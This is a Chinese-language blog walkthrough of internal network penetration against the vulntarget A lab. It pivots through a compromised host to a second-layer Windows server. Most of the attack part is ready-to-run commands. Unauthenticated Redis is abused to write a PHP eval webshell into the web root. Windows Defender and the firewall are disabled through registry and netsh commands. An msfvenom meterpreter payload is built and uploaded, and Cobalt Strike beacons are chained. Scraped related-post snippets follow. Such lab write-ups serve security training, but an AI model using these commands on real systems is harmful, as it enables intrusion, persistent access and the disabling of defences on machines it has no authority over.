内网安全:内网渗透.(拿到内网主机最高权限)

内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口,让外网的电脑找到处于内网的电脑。端口映射,就是NAT地址转换的一种,功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或服务器上运行到内网穿透客户端,此时域名解析到的IP地址是局域网网关出口处的公网IP地址,再在网关处做端口映射指向监控设备即可.


目录:

内网安全:内网渗透.(拿到内网主机最高权限)

网络环境所示:

主机信息:

内网渗透 测试:

(1)内网主机探测:

(2)构建通道:

(3)内网扫描:

(4)内网渗透:

(5)上线 MSF  :

(6)上线 CS  :


免责声明:

严禁利用本文章中所提到的虚拟机和技术进行任何形式的攻击,否则后果自负,上传者不承担任何责任。


网络环境所示:


主机信息:

主机

外网

内网1 内网2
kali 192.168.0.101
win 7 192.168.0.102 10.0.20.98
win 2016 10.0.20.99 10.0.10.111
win 2019 10.0.10.110

前面的 Web服务器 渗透:Web安全:拿到 Web 服务器 最高权限.(vulntarget 靶场 1)_半个西瓜.的博客-CSDN博客


内网渗透 测试:

(1)内网主机探测:

shell ipconfig            //查看 网卡的 网段信息.

主机探测和端口探测.

发现一台内网主机,IP为 10.0.20.99


(2)构建通道:

代理转发.【msf 代理】run post/multi/manage/autoroute            // 添加路由run autoroute -p                           // 查看路由


代理转发.【CS 代理】

查看代理信息.

修改配置 /etc/proxychains4.conf 文件vim /etc/proxychains4.conf        //打开这个文件.


(3)内网扫描:

浏览器配置代理:

进行访问 第二层内网主机的 6379 端口( Redis 服务 )proxychains4 redis-cli -h 10.0.20.99proxychains4 redis-cli -h 【第二层内网 主机 IP 地址】


(4)内网渗透:

利用 Redis 未授权漏洞.
由于 10.0.20.99 这台机器开启了Web服务,我们要通过 Resis 未授权漏洞写入webshell,于是我们
需要知道网站的绝对路径,并且需要具有读写权限。方法一:
我们也可以简单探测,有没有可能暴露敏感信息的文件
比如:/phpinfo.php 这些文件.(这个过程可以使用目录扫描等等方法.)
(Resis 未授权漏洞 默认路径: C:\phpStudy\PHPTutorial\www\)方法二:
如果不是这个默认路径,则修改为路径: Redis写启动项(需要猜路径 猜用户名),定时自动执行bat脚本
上线或者反弹shell

因此我们写入 wenshell (一句话木马)
(1)proxychains4 redis-cli -h 10.0.20.99        //连接 Redis 服务.(2)config set dir "C:/phpStudy/PHPTutorial/www/"
//在网站的根目录下写进去一个脚本.(C:/phpStudy/PHPTutorial/www/ 是 win 默认路径)(3)config set dbfilename bgxg.php                //脚本名称为 bgxg.php(4)set 1 "<?php @eval($_POST['bgxg']);?>"        // 脚本内容(一句话木马)(5)save                                          // 保存 刚刚写入的信息.

上传木马程序,需要关闭 Windows Denfder REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /fgpupdate /force

上传木马程序,需要关闭防火墙.(1)Netsh advfirewall show allprofiles        // 查看防火墙配置(2)netSh advfirewall set allprofiles state off        // 关闭防火墙


(5)上线 MSF :

渗透 第二层 内网.[msf 代理]
run post/multi/manage/autoroute            // 添加路由run autoroute -p                           // 查看路由background                                 // 挂起 会话

重新再生成一个新的程序(木马)【用来渗透第二层内网.】msfvenom -p windows/meterpreter/bind_tcp LHOST=192.168.0.101 LPORT=12345 -f exe > 12345.exe

set payload windows/meterpreter/bind_tcp       // 设置 payload set lport 12345                                // 设置 和程序(木马)的端口set rhost 10.0.20.99                           // 设置 第二层内网的目标主机.run                                            // 进行 测试.

利用 蚁剑 进行上传 程序(木马)到第二层主机中 并执行.


(6)上线 CS  :

建立 Beacon TCP 监听器:

生成一个新程序木马.(要来渗透第二层内网的其他主机)

利用 蚁剑 进行上传 程序(木马)

connect 10.0.20.99 666connect 第二层内网主机 IP 地址 木马的端口

内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)相关推荐

  1. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  2. 内网安全(四)---横向渗透:PTHPTKPTT

    域横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值. PTT(pass the ticket): 利用的 ...

  3. 内网渗透测试:内网横向移动基础总结

    内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围.通过此类手段 ...

  4. 《内网安全攻防:渗透测试实战指南》读书笔记(八):权限维持分析及防御

    目录 前言 一.操作系统后门 1.粘滞键后门 2.注册表注入后门 3.计划任务后门 4.meterpreter后门 5.Cymothoa后门 6.WMI后门 二.WEB后门 1.Nishang下的We ...

  5. 《内网安全攻防:渗透测试实战指南》读书笔记(二):内网信息收集

    目录 前言 一.收集本机信息 1.手动搜集 (1)查询网络配置 (2)查询操作系统及软件的信息 (3)查询本机服务信息 (4)查询进程列表 (5)查看启动程序信息 (6)查看计划任务 (7)查看主机开 ...

  6. 内网渗透系列:内网隧道之ICMP隧道

    目录 前言 一.ICMP隧道技术 1.ICMP协议 (1)报文格式 (2)ping 2.ICMP隧道 (1)原理 (2)优缺点 二.ICMP隧道工具 1.icmpsh (1)源码 (2)用法 2.ic ...

  7. 内网渗透系列:内网信息搜集方法小结2

    目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...

  8. 《内网安全攻防:渗透测试实战指南》读书笔记(四):权限提升分析及防御

    目录 前言 一.系统内核溢出漏洞提权分析及防范 1.通过手动执行命令发现缺失补丁 (1)MS16-032(KB3139914) 2.利用MSF发现缺失补丁 3.Windows Exploit Sugg ...

  9. 《内网安全攻防:渗透测试实战指南》读书笔记(一):内网渗透测试基础

    目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...

最新文章

  1. python 文件格式转换_Python的处理数据,如何进行数据转换,学会三种方式
  2. Paper:《NÜWA: Visual Synthesis Pre-training for Neural visUal World creAtion,女娲:用于神经视觉世界创造的视觉》翻译与解读
  3. Python教程:快速掌握列表的常用方法
  4. ios::sync_with_stdio();
  5. 【PAT甲级 排序】1036 Boys vs Girls (25 分) C++
  6. java nosql_Java EE的NoSQL的未来
  7. Vite2.0搭建Vue3移动端项目
  8. 再见2019,拥抱2020
  9. Oracle导入导出之dmp
  10. 【ANSYS命令流】模型的建立(二):其他相关命令(图形控制、节点单元选择等)
  11. Python源码阅读(一)
  12. uv纹理坐标设定与贴图规则
  13. Redux Reducer 的拆分
  14. Java编程思想-并发(5)
  15. java jsp使用flash播放mp4,(jsp/html)网页上嵌入播放器(常用播放器代码整理)
  16. Android中的传感器之---光线传感器
  17. Jquery鼠标点击后变色,点击另一个按钮颜色还原
  18. 安卓Android基于百度云平台人脸识别学生考勤签到系统设计
  19. 潜心Build!Web3.0行业近期高融资项目有哪些?
  20. 如何在cmd命令行下切换目录(详细步骤)

热门文章

  1. license生成方案
  2. 用c语言编写:将两个字符串连接起来,不使用stract()函数
  3. 【树莓派】树莓派开放WiFi热点
  4. 极点五笔for linux
  5. GIS文件 | EXCEL中打开ShapeFile等GIS文件
  6. 【对讲机的那点事】你了解对讲机IP互联中继台系统实现的原理及网络模型吗?...
  7. android录视频花屏,拍大师录制视频花屏怎么办 拍大师录制视频花屏的解决方法...
  8. mega-nerf安装流程
  9. 一位IT从业人员的心路历程
  10. D. Puzzles [排列组合]